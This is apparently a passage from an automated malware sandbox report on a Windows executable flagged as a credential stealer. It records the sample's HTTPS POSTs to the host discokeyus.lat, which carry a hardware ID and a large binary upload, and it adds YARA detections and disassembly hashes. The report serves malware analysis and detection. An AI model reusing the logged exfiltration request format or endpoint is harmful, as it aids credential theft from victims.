                                                                                                                                            2024-12-20 16:24:56 UTC1220OUTData Raw: 2d 2d 59 45 49 36 32 41 31 55 57 53 42 4f 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 42 46 45 30 31 30 42 37 37 41 34 36 37 35 31 39 41 43 38 39 32 33 38 35 30 33 30 35 44 31 33 45 0d 0a 2d 2d 59 45 49 36 32 41 31 55 57 53 42 4f 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 31 0d 0a 2d 2d 59 45 49 36 32 41 31 55 57 53 42 4f 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 50 73 46 4b 44 67 2d 2d 70 61 62 6c 6f 0d 0a 2d 2d 59 45 49 36 32 41 31 55 57 53 42 4f 0d 0a
                                                                                                                                            Data Ascii: --YEI62A1UWSBOContent-Disposition: form-data; name="hwid"BFE010B77A467519AC8923850305D13E--YEI62A1UWSBOContent-Disposition: form-data; name="pid"1--YEI62A1UWSBOContent-Disposition: form-data; name="lid"PsFKDg--pablo--YEI62A1UWSBO
                                                                                                                                            2024-12-20 16:24:57 UTC1129INHTTP/1.1 200 OK
                                                                                                                                            Date: Fri, 20 Dec 2024 16:24:57 GMT
                                                                                                                                            Content-Type: text/html; charset=UTF-8
                                                                                                                                            Transfer-Encoding: chunked
                                                                                                                                            Connection: close
                                                                                                                                            Set-Cookie: PHPSESSID=k9jjatsv5jahh5eu99meranmgs; expires=Tue, 15 Apr 2025 10:11:35 GMT; Max-Age=9999999; path=/
                                                                                                                                            Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                                                                                            Cache-Control: no-store, no-cache, must-revalidate
                                                                                                                                            Pragma: no-cache
                                                                                                                                            X-Frame-Options: DENY
                                                                                                                                            X-Content-Type-Options: nosniff
                                                                                                                                            X-XSS-Protection: 1; mode=block
                                                                                                                                            cf-cache-status: DYNAMIC
                                                                                                                                            vary: accept-encoding
                                                                                                                                            Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=g%2FCLD5hD8TV%2FP8sdky4iEeZpX7G5Io47mrz1r86F6IoobR41FpXzJVZG81X4CE5JlO2Li8SAaCbkhJz%2BleCmSvGQrILjuK7hviWfzwUpfFPmUsVXCLrExQnVd%2F0dAcgKuQ%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                            NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                            Server: cloudflare
                                                                                                                                            CF-RAY: 8f50fc484bac72b7-EWR
                                                                                                                                            alt-svc: h3=":443"; ma=86400
                                                                                                                                            server-timing: cfL4;desc="?proto=TCP&rtt=1999&min_rtt=1999&rtt_var=750&sent=6&recv=7&lost=0&retrans=0&sent_bytes=2832&recv_bytes=2129&delivery_rate=1458541&cwnd=192&unsent_bytes=0&cid=d194f17ab3cf100e&ts=1057&x=0"
                                                                                                                                            2024-12-20 16:24:57 UTC20INData Raw: 66 0d 0a 6f 6b 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 0d 0a
                                                                                                                                            Data Ascii: fok 8.46.123.189
                                                                                                                                            2024-12-20 16:24:57 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                                                            Data Ascii: 0


                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                            6192.168.2.549732104.21.21.994431732C:\Users\user\Desktop\0WO49yZcDA.exe
                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                            2024-12-20 16:24:58 UTC276OUTPOST /api HTTP/1.1
                                                                                                                                            Connection: Keep-Alive
                                                                                                                                            Content-Type: multipart/form-data; boundary=Z3PDZSBFPSX6O
                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                                                                                            Content-Length: 550974
                                                                                                                                            Host: discokeyus.lat
                                                                                                                                            2024-12-20 16:24:58 UTC15331OUTData Raw: 2d 2d 5a 33 50 44 5a 53 42 46 50 53 58 36 4f 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 42 46 45 30 31 30 42 37 37 41 34 36 37 35 31 39 41 43 38 39 32 33 38 35 30 33 30 35 44 31 33 45 0d 0a 2d 2d 5a 33 50 44 5a 53 42 46 50 53 58 36 4f 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 31 0d 0a 2d 2d 5a 33 50 44 5a 53 42 46 50 53 58 36 4f 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 50 73 46 4b 44 67 2d 2d 70 61 62 6c 6f 0d 0a 2d 2d 5a 33 50 44 5a 53 42 46 50 53 58
                                                                                                                                            Data Ascii: --Z3PDZSBFPSX6OContent-Disposition: form-data; name="hwid"BFE010B77A467519AC8923850305D13E--Z3PDZSBFPSX6OContent-Disposition: form-data; name="pid"1--Z3PDZSBFPSX6OContent-Disposition: form-data; name="lid"PsFKDg--pablo--Z3PDZSBFPSX
                                                                                                                                            2024-12-20 16:24:58 UTC15331OUTData Raw: e1 78 cd c8 2c ac f4 a4 06 8d 7b fd 6b 26 bb ec 5b 2c 05 36 e1 07 ea 53 ee 5d f6 93 d0 cc 09 c6 55 be 5f e2 e0 db 3b 1c 93 b5 58 b3 73 54 72 f9 fb 0d 2a 16 be 23 1c a1 eb 46 da 4a d9 ca 39 29 74 7e 7e e4 b2 b2 3b 8f 2c 76 f3 8a 9c 66 26 2c 42 e9 76 d5 d6 cd 7e e0 1f f7 13 7d 33 27 3b 86 8c 8d fd b7 4a 32 9c 6d d9 a4 4c 55 1a 1d a9 88 7a e0 c9 48 e9 48 61 05 28 3e fb 9d 8e f3 b2 f4 d0 08 f0 21 61 10 ef 87 4d 14 bd 07 b1 1c 31 30 32 14 56 76 6e 64 8c 5f c8 6a a4 e9 f3 13 de 82 d4 88 c6 f9 37 0d 49 b3 7f 9b 52 48 7c c1 3c 39 21 d0 f3 c0 2d fc ac c3 82 89 3f 2e f5 67 66 a0 10 40 15 e6 0e c6 ee 26 ea a5 94 67 66 9a 98 a8 e3 ed ac 0a 44 a8 b3 6c 55 c6 27 1f 0a ed 26 16 69 c8 72 10 92 9a bd 33 49 bf 58 ea 5f f0 39 cd 5f f8 db 94 3a ab 43 bd 20 42 9d c9 ff 39 4a
                                                                                                                                            Data Ascii: x,{k&[,6S]U_;XsTr*#FJ9)t~~;,vf&,Bv~}3';J2mLUzHHa(>!aM102Vvnd_j7IRH|<9!-?.gf@&gfDlU'&ir3IX_9_:C B9J
                                                                                                                                            2024-12-20 16:24:58 UTC15331OUTData Raw: e8 d8 ef b6 e8 fa 3a 54 43 6e ba 94 de 2e f5 fa d3 ba e2 b3 df d6 92 17 f5 05 b5 89 4f 9f ec 97 8b 91 e5 f3 4a ef 24 bc e7 51 13 28 bb 1a 54 2c 43 91 3f 44 c4 83 de 5b fd d1 f1 26 b0 17 b8 a0 c6 f0 d7 2c 05 4e 50 5c 26 8a 41 c0 f8 14 49 69 bd 3b 8f 37 3d 7b ca 1f 5e 66 7f 0c 3f e5 f0 f8 05 ab 21 f8 c3 ac c7 db c5 97 f2 ac c8 a1 47 c3 2b 7c 94 ea 1b 14 6a 15 a3 98 af 62 ef 4c b0 f7 01 7e 54 84 1c c5 94 be d3 9b ef 74 5a 19 44 3e cf 0d 4f 89 d2 31 28 56 5c 09 ca 3c 1f cc 2b 59 47 a9 27 63 61 f3 b7 cb d4 07 b0 d7 44 4f 8c 61 75 f9 0a 6a bb 32 73 bf 55 53 ee 2d 91 57 72 9a a4 4b 97 25 05 cf 79 e6 58 c4 ee e7 e7 49 ba 58 df bf 8e 80 ca b5 b0 60 c2 39 79 ff 15 c1 7a 38 0a ba b2 52 dc c6 39 9d 4f 6d 96 f0 1a 88 e3 15 34 6b 8f b0 cf a9 12 c6 5b 41 53 d0 b7 d1 c4
                                                                                                                                            Data Ascii: :TCn.OJ$Q(T,C?D[&,NP\&AIi;7={^f?!G+|jbL~TtZD>O1(V\<+YG'caDOauj2sUS-WrK%yXIX`9yz8R9Om4k[AS
                                                                                                                                            2024-12-20 16:24:58 UTC15331OUTData Raw: d7 37 ab ef 09 b0 0c 7e 1e 04 67 9f 62 8b 84 40 64 b7 fa 30 a6 61 da 93 08 ac 6e 22 55 08 f7 b0 fc 22 39 71 eb 3c 5f 3c 16 9f 4a ff dc 8f e1 44 0d 56 12 a1 58 e2 11 89 bf 2f b7 25 dd 75 44 51 1b 09 53 06 b4 28 ab 7e 46 62 f5 c6 bd f3 6b 2e 4d dc fa 0d a9 1c 9f 6a 7f ff 8a 4b 0e 3d f5 5a 28 ca 77 d3 f0 bf 76 88 87 25 13 be 26 c7 0b d6 d9 87 8d ea 84 e9 4b 47 21 72 5b 46 5f a8 58 f0 df a9 32 a5 73 ef 4e 58 f7 46 d9 7d c9 7f 3f ba 5d 7e d3 e4 98 46 82 1b b1 e6 ae 2f fa f7 5f 57 05 32 59 21 25 1c a6 17 16 1d b6 67 c4 f7 84 da 8d 6a de 48 35 d9 fe 54 92 f1 79 17 1f 62 4f 69 02 1e a8 60 7f 12 53 86 12 bf 76 a1 c3 ac ae b6 23 b7 d7 d6 1d ef 90 f4 03 ba b8 4d c3 28 23 9d df ed bb 41 eb 8f 76 8f 99 74 5d bc 96 9c 9d 3b 70 48 b2 8f 1e a0 bd ef 8f 38 d2 b0 b3 27 ec
                                                                                                                                            Data Ascii: 7~gb@d0an"U"9q<_<JDVX/%uDQS(~Fbk.MjK=Z(wv%&KG!r[F_X2sNXF}?]~F/_W2Y!%gjH5TybOi`Sv#M(#Avt];pH8'
                                                                                                                                            2024-12-20 16:24:58 UTC15331OUTData Raw: 99 72 d4 3f a3 1e 3c 55 9a ed 17 5c 5f 32 87 53 95 d0 46 4b e2 8b 9b 07 4b 94 d3 14 e2 71 2e 86 e4 1c eb e7 b6 1a 23 6b 11 53 2a 54 d3 70 9f 9d 2a 1e e5 a1 11 db da a7 52 8c 02 d4 05 28 aa e0 d4 43 79 c5 0a 95 0d 32 a1 55 4b 5a 76 64 3d 0e d7 2d b1 8f 3e 33 58 f0 6b bd e5 8c 86 ef c8 e5 80 7e 5d 2d ec c9 cc 97 60 2c ee c4 4c 18 cf e0 8f 4c 68 e6 69 8f 4b 41 b0 c3 d2 f2 89 6b fc ed 6d df 62 16 fa c6 97 0b 7c 83 c8 e6 cd 99 3f 69 9f e8 d7 d7 9a e6 fe fb 51 9c ac 01 c8 4e 0a 40 fe a9 a3 d5 7c f4 6d 68 b1 2b 64 72 ba d3 8e 4a 17 b3 9a a9 7d 1c a9 c0 34 ac d2 15 0b 56 62 ba 7f 9e 17 0b b0 d0 46 02 f4 0c 84 9f d7 94 f2 2a ff 6d 74 a4 ea b0 2e 91 87 f7 23 bf b5 4b c5 8d f2 74 7f c2 9b 49 8b de 30 e2 fa 94 07 15 d1 9a f9 78 57 dc 75 01 72 65 86 e9 0d f1 cc 7e f4
                                                                                                                                            Data Ascii: r?<U\_2SFKKq.#kS*Tp*R(Cy2UKZvd=->3Xk~]-`,LLhiKAkmb|?iQN@|mh+drJ}4VbF*mt.#KtI0xWure~
                                                                                                                                            2024-12-20 16:24:58 UTC15331OUTData Raw: 72 6d 63 cb e8 ba 88 a1 c4 e0 a2 9a 8c 8c 70 aa ee 46 87 46 43 00 8f a8 74 66 df 1f 96 43 cc e4 cd 95 d1 94 e0 3d 75 11 9a cd 55 94 ef c8 32 d9 96 d5 14 19 48 72 29 c5 c0 45 4d 5a 5c 54 73 50 34 f2 c0 c7 c4 9e ab 60 58 cd 7a cb 60 b1 19 15 e7 af 8a 53 e8 a9 bf 4f 5f 31 d7 48 b9 15 19 2d 70 e4 26 88 f1 72 13 d1 0e a9 3f ac cf 2c b6 3e 6b e5 94 51 82 fe 38 fd 70 f6 d7 3f 59 2f 15 31 f4 fc 55 ba 14 c5 d4 ae dd 34 0c e2 1e 10 cb 9e 66 da d5 4a 66 2b 83 d6 47 b0 88 91 5c 65 aa b1 6e b8 6e 3c ca 36 3a 0d 45 f1 e7 bf 9e f8 93 86 32 e4 5d 9f e2 ab 54 c3 3f 7d d4 9d 69 22 1f c7 d9 2b 73 36 3a 5d 97 2b 26 79 48 e1 f7 4a ef 93 f0 b7 49 fd a3 4d be 6a c6 8f 0a a2 83 51 14 63 a3 a8 50 22 c7 3b aa 54 5d 6c e0 9c 44 dd 0d c7 92 4d 02 7a 5e b5 fa 86 4b 02 05 1b 24 b6 d6
                                                                                                                                            Data Ascii: rmcpFFCtfC=uU2Hr)EMZ\TsP4`Xz`SO_1H-p&r?,>kQ8p?Y/1U4fJf+G\enn<6:E2]T?}i"+s6:]+&yHJIMjQcP";T]lDMz^K$
                                                                                                                                            2024-12-20 16:24:58 UTC15331OUTData Raw: b4 a1 ab 87 8d ec 5a b3 61 c2 98 c9 62 90 c0 15 58 61 73 76 11 7b 75 f2 a8 84 1b 32 01 62 38 87 e1 fa 5d 97 a7 34 3c 1b d7 1b 6c f5 34 b2 e4 e9 5d 61 e3 b8 b6 1c 02 ac 31 a8 06 79 fa ac c8 b5 66 7f f3 9c c4 3a 51 1b ca 0a ee 44 b9 c6 67 85 a0 76 02 a7 15 fc 18 e6 b5 fb 01 2f 0d 48 03 ce aa 35 13 5f 06 0b 67 d8 f6 c3 cc d0 24 29 62 05 3f 4f b3 b5 fe fa e0 88 f8 47 35 8b 21 bb 32 9b 15 f5 d9 57 fb a9 64 90 90 b0 55 48 89 f4 a6 8e f0 fb af b8 44 78 fc 5a 8c 79 30 1b 58 bb 5e 15 c5 fd a7 2e 5e 7a 3b 91 c3 5f a1 c8 f1 a2 7e 65 f2 66 3f fb 9e 0e f3 ff ce 6b ed 79 ba fa 77 f5 d1 fb 9e bd 77 f6 16 1c 15 c4 ff b8 6f 1e 65 13 d9 20 09 96 a6 aa 57 73 3d b7 a4 58 44 86 88 08 54 00 ef c9 d3 f2 19 61 0f 65 1e 6e ba d8 54 d0 a4 04 cc de 0c 4d fc 37 73 61 08 64 a1 69 1e
                                                                                                                                            Data Ascii: ZabXasv{u2b8]4<l4]a1yf:QDgv/H5_g$)b?OG5!2WdUHDxZy0X^.^z;_~ef?kywwoe Ws=XDTaenTM7sadi
                                                                                                                                            2024-12-20 16:24:58 UTC15331OUTData Raw: 6b b3 4c e2 40 ad 4a 4d df 9c cd 37 19 5b 05 7c 33 98 87 96 65 26 2e 94 db 50 45 ae 02 ec 0b 24 c1 40 f0 e5 30 c9 ad ef e6 65 d4 45 bb c2 66 f4 c8 aa 93 2f 55 47 56 26 6c 80 1d 18 16 97 5b 01 72 e3 fb 37 cc 78 ff b6 99 41 24 92 08 c2 12 35 9e 2d 46 99 37 d2 a3 f0 8b 56 ef 3e 53 df b4 da 5e 62 a4 4f 48 11 76 76 e8 90 94 6f e4 10 ec 06 a9 8b 07 ba ac ac 9c bb 88 6d 82 e6 78 fc 4c 44 44 59 3c d5 3e 50 fd d8 69 f1 25 a3 ce 94 38 f5 9e 09 df 95 10 0b fc 87 cb a9 e3 f8 bd df fa 2b fe 46 e7 0e b7 98 a0 8a b2 8b 58 13 7c 43 d4 d2 6f bf 1a 95 a1 e9 d0 f1 89 f1 9f 3f 18 d2 24 13 a6 b9 75 a4 e8 42 5b 7b 36 55 58 b4 de 7d 35 0f 91 19 52 23 3a 3e ca b0 b2 88 0b 01 51 ed ef 0b f4 00 b1 02 2d ca 39 ae 8f 50 c2 1c 85 0e e6 69 ca e7 05 7a 98 b6 d8 0f 66 55 70 a6 0e 13 4d
                                                                                                                                            Data Ascii: kL@JM7[|3e&.PE$@0eEf/UGV&l[r7xA$5-F7V>S^bOHvvomxLDDY<>Pi%8+FX|Co?$uB[{6UX}5R#:>Q-9PizfUpM
                                                                                                                                            2024-12-20 16:24:58 UTC15331OUTData Raw: 72 ac 72 01 35 0b 99 f2 41 46 54 aa cc 8a a1 0c 94 7c 20 a9 c7 b1 e5 e5 20 42 65 b7 7a a0 5d d7 ca ad 87 37 e9 d1 b0 96 7a f1 45 4d 0a 01 e3 57 7d e6 f6 59 71 33 e5 44 1f 73 53 22 81 6a 56 b2 ac 5e 0a 28 81 88 7d 88 77 3a b0 bd 1a fc 7b 1f 26 de ea 5c f2 7a 2a 5d 62 4a 31 4e 09 66 1f 5c f1 1b 89 1d 14 2e 4e 4f 2b 4b 4f ff 76 24 31 fe 26 1e 1d f9 f3 3d 55 70 5b 74 61 5c 96 e1 ba 47 2d 01 c3 09 11 9a 0e 14 1a bb 3f 50 5a 09 e6 cb f5 10 43 8f 62 23 2a fd 4d aa 31 26 1d 05 0e dd 3c 2f 78 28 ae d6 51 0d f1 79 24 86 a7 fa b6 9c b6 f3 99 67 e4 f8 a6 ca cd 2d 63 ee 05 8a f4 9f 55 76 57 4c 88 24 9a 50 8c e3 08 18 06 22 86 27 2d 39 65 28 bc f5 45 ff 01 a9 c4 c0 6b 79 86 68 8d 9d 3b 07 7a 8a f0 5e 1f 43 b0 6f 9d 2c 87 e2 f3 f1 01 f8 e4 28 a9 6d 51 14 8c f3 66 d3 c2
                                                                                                                                            Data Ascii: rr5AFT| Bez]7zEMW}Yq3DsS"jV^(}w:{&\z*]bJ1Nf\.NO+KOv$1&=Up[ta\G-?PZCb#*M1&</x(Qy$g-cUvWL$P"'-9e(Ekyh;z^Co,(mQf
                                                                                                                                            2024-12-20 16:24:58 UTC15331OUTData Raw: bb 5c 89 9d ee a2 a4 46 af 56 22 d7 bb 18 b4 80 20 3d 1d 6c 27 f1 7e 0a 22 8c 36 71 f9 0a 29 7f cc 23 dd 2a 51 2b e2 73 33 35 e3 2a d6 3a 83 d6 aa ae c7 aa f0 39 d2 6e 5e af 12 0c 35 a0 b0 1b b6 70 e0 5f 65 79 be 96 c7 b6 2e a9 83 32 da c0 d0 61 40 6a bf 9b 26 e5 a3 be 59 7e 9c fa 06 10 05 36 07 91 31 d7 3a 49 3f 6d 89 89 d1 af 29 a4 97 26 d5 8a c0 1a e3 24 05 1d 3f 9c f2 ea c0 7c 5a 09 e1 32 10 9e 47 81 97 46 65 82 32 fb c0 d3 97 ca ab 5c 86 e0 44 5d 0d 53 04 c6 e2 b9 c3 12 82 00 54 a1 eb 04 29 ff 5d b8 7d 10 96 75 63 5b 0c 71 4e 79 91 a8 d6 72 c3 24 eb 55 de 1b e9 72 a6 f1 8f 72 90 9e 97 86 4b a3 a7 4d e4 94 88 83 b9 62 62 ed d6 29 43 46 9a 30 b1 58 84 fc 2b 0c 12 4b 3a 44 09 c1 6c 9b 18 6e e2 86 e1 2b 90 a0 5e 4b 64 b0 28 e7 02 b5 bb f9 b3 57 3f 0a 89
                                                                                                                                            Data Ascii: \FV" =l'~"6q)#*Q+s35*:9n^5p_ey.2a@j&Y~61:I?m)&$?|Z2GFe2\D]ST)]}uc[qNyr$UrrKMbb)CF0X+K:Dln+^Kd(W?
                                                                                                                                            2024-12-20 16:25:01 UTC1137INHTTP/1.1 200 OK
                                                                                                                                            Date: Fri, 20 Dec 2024 16:25:01 GMT
                                                                                                                                            Content-Type: text/html; charset=UTF-8
                                                                                                                                            Transfer-Encoding: chunked
                                                                                                                                            Connection: close
                                                                                                                                            Set-Cookie: PHPSESSID=0tjsr29cqnruh69csbmbo2jq4f; expires=Tue, 15 Apr 2025 10:11:39 GMT; Max-Age=9999999; path=/
                                                                                                                                            Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                                                                                            Cache-Control: no-store, no-cache, must-revalidate
                                                                                                                                            Pragma: no-cache
                                                                                                                                            X-Frame-Options: DENY
                                                                                                                                            X-Content-Type-Options: nosniff
                                                                                                                                            X-XSS-Protection: 1; mode=block
                                                                                                                                            cf-cache-status: DYNAMIC
                                                                                                                                            vary: accept-encoding
                                                                                                                                            Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=%2FZRJU%2Fqm%2FrWtahCd8Refyx1zqEyMgL6eDsCadAHe28PU5xzl0V3uIduM5S5QJ9%2FC8SET9J83VCVJzK98KVLTkYS7rnQk9Mlc2WryadxNTR0OO0%2BG6kR9rFBCa05x4gYYUg%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                            NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                            Server: cloudflare
                                                                                                                                            CF-RAY: 8f50fc59bc5017e9-EWR
                                                                                                                                            alt-svc: h3=":443"; ma=86400
                                                                                                                                            server-timing: cfL4;desc="?proto=TCP&rtt=1698&min_rtt=1685&rtt_var=659&sent=304&recv=574&lost=0&retrans=0&sent_bytes=2833&recv_bytes=553448&delivery_rate=1626740&cwnd=232&unsent_bytes=0&cid=b8382314148c7e3d&ts=2364&x=0"


                                                                                                                                            Statistics

                                                                                                                                            CPU Usage

                                                                                                                                            Click to jump to process

                                                                                                                                            Memory Usage

                                                                                                                                            Click to jump to process

                                                                                                                                            High Level Behavior Distribution

                                                                                                                                            Click to dive into process behavior distribution

                                                                                                                                            System Behavior

                                                                                                                                            General

                                                                                                                                            Target ID:0
                                                                                                                                            Start time:11:24:40
                                                                                                                                            Start date:20/12/2024
                                                                                                                                            Path:C:\Users\user\Desktop\0WO49yZcDA.exe
                                                                                                                                            Wow64 process (32bit):true
                                                                                                                                            Commandline:"C:\Users\user\Desktop\0WO49yZcDA.exe"
                                                                                                                                            Imagebase:0xf70000
                                                                                                                                            File size:1'870'848 bytes
                                                                                                                                            MD5 hash:91E4F1AB8170B4AF79EC38F14533F6C4
                                                                                                                                            Has elevated privileges:true
                                                                                                                                            Has administrator privileges:true
                                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                                            Yara matches:
                                                                                                                                            • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000000.00000003.2412277604.0000000001996000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                            • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000000.00000003.2412704361.0000000001996000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                            • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000000.00000003.2503586892.0000000001996000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                            • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000000.00000003.2437512461.0000000001996000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                            • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000000.00000003.2462451964.0000000001996000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                            • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000000.00000003.2462536117.0000000001996000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                            Reputation:low
                                                                                                                                            Has exited:true

                                                                                                                                            Disassembly

                                                                                                                                            Reset < >

                                                                                                                                              Non-executed Functions

                                                                                                                                              Function 061392D3 Relevance: 1.4, Strings: 1, Instructions: 152COMMON
                                                                                                                                              Download Yara Rule
                                                                                                                                              Strings
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000000.00000003.2462602486.0000000006136000.00000004.00000800.00020000.00000000.sdmp, Offset: 06135000, based on PE: false
                                                                                                                                              • Associated: 00000000.00000003.2462352801.0000000006135000.00000004.00000800.00020000.00000000.sdmpDownload File
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_0_3_6135000_0WO49yZcDA.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID:
                                                                                                                                              • String ID: ,
                                                                                                                                              • API String ID: 0-3772416878
                                                                                                                                              • Opcode ID: f8d20de7342adb6250e4578e505cae4ec6fb0150bb9ffe39e89fe8eede7c52c2
                                                                                                                                              • Instruction ID: bdbab238abe9489603863fac8f1ad22f3d40c67ffd42db211c656b3bdc236a9a
                                                                                                                                              • Opcode Fuzzy Hash: f8d20de7342adb6250e4578e505cae4ec6fb0150bb9ffe39e89fe8eede7c52c2
                                                                                                                                              • Instruction Fuzzy Hash: 0E5152A941D2D39ECB4A2E38E28E8037F78EB1E2043514BCAD8A0D907BC596D593C713
                                                                                                                                              Function 061394C3 Relevance: 1.4, Strings: 1, Instructions: 107COMMON
                                                                                                                                              Download Yara Rule
                                                                                                                                              Strings
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000000.00000003.2462602486.0000000006136000.00000004.00000800.00020000.00000000.sdmp, Offset: 06135000, based on PE: false
                                                                                                                                              • Associated: 00000000.00000003.2462352801.0000000006135000.00000004.00000800.00020000.00000000.sdmpDownload File
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_0_3_6135000_0WO49yZcDA.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID:
                                                                                                                                              • String ID: 0
                                                                                                                                              • API String ID: 0-4108050209
                                                                                                                                              • Opcode ID: d408998279dc634ed1866d0c3e9d9570be2c0021b4a6a947306b1b8d491a6a84
                                                                                                                                              • Instruction ID: cf94571d183cf212c5a37c0115bf8c05bc32025b8cfffb378ce585ee1f1d9da4
                                                                                                                                              • Opcode Fuzzy Hash: d408998279dc634ed1866d0c3e9d9570be2c0021b4a6a947306b1b8d491a6a84
                                                                                                                                              • Instruction Fuzzy Hash: E7310CAEC0E5C26DDF5B2E38D21D9867F64EE2F1447190BDFC5A0DA42BC4419287C702
                                                                                                                                              Function 06139629 Relevance: .7, Instructions: 664COMMON
                                                                                                                                              Download Yara Rule
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000000.00000003.2462602486.0000000006136000.00000004.00000800.00020000.00000000.sdmp, Offset: 06135000, based on PE: false
                                                                                                                                              • Associated: 00000000.00000003.2462352801.0000000006135000.00000004.00000800.00020000.00000000.sdmpDownload File
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_0_3_6135000_0WO49yZcDA.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID:
                                                                                                                                              • String ID:
                                                                                                                                              • API String ID:
                                                                                                                                              • Opcode ID: 2dab7f6601efbbc28d094d4f3ad86853c5a56985c17e169f3cf77b8ec25991d6
                                                                                                                                              • Instruction ID: 8d4e5ae1f098da237328f0e293809884fd3a042e7fd067d2c07341373cc02d13
                                                                                                                                              • Opcode Fuzzy Hash: 2dab7f6601efbbc28d094d4f3ad86853c5a56985c17e169f3cf77b8ec25991d6
                                                                                                                                              • Instruction Fuzzy Hash: D342D1318093D19EDBA39F749165683BFB1BF4B714BAA19EDC4C24F423D3626542CB82
                                                                                                                                              Function 06139AB9 Relevance: .2, Instructions: 205COMMON
                                                                                                                                              Download Yara Rule
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000000.00000003.2462602486.0000000006136000.00000004.00000800.00020000.00000000.sdmp, Offset: 06135000, based on PE: false
                                                                                                                                              • Associated: 00000000.00000003.2462352801.0000000006135000.00000004.00000800.00020000.00000000.sdmpDownload File
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_0_3_6135000_0WO49yZcDA.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID:
                                                                                                                                              • String ID:
                                                                                                                                              • API String ID:
                                                                                                                                              • Opcode ID: 3f01f84498530bf929d282abbf65c94ee4ffb16183ca814506239d5784e898ed
                                                                                                                                              • Instruction ID: 4da7ce4511161a98c269a9789b994fc88c319ae694fa8d490688635c535d9b6e
                                                                                                                                              • Opcode Fuzzy Hash: 3f01f84498530bf929d282abbf65c94ee4ffb16183ca814506239d5784e898ed
                                                                                                                                              • Instruction Fuzzy Hash: CA710E728093D19EDBA79F748164683BFB1BF4B61476A48EDC0C25F133D7626882CB42